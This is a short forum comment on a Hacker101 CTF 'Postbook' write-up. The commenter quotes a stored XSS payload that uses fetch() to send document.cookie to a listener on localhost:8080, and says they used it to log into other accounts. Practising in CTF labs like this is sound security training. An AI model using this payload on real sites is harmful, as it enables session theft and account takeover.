DEV Community

Discussion on: Hacker101 CTF - Postbook

Collapse
 
souvikinator profile image
Souvik Kar Mahapatra

yeah even I found that and I used it to steal cookie using: <script>fetch('http://localhost:8080/?'+document.cookie)</script> it and easily logged into other accounts without username or password, however no flags found ;-;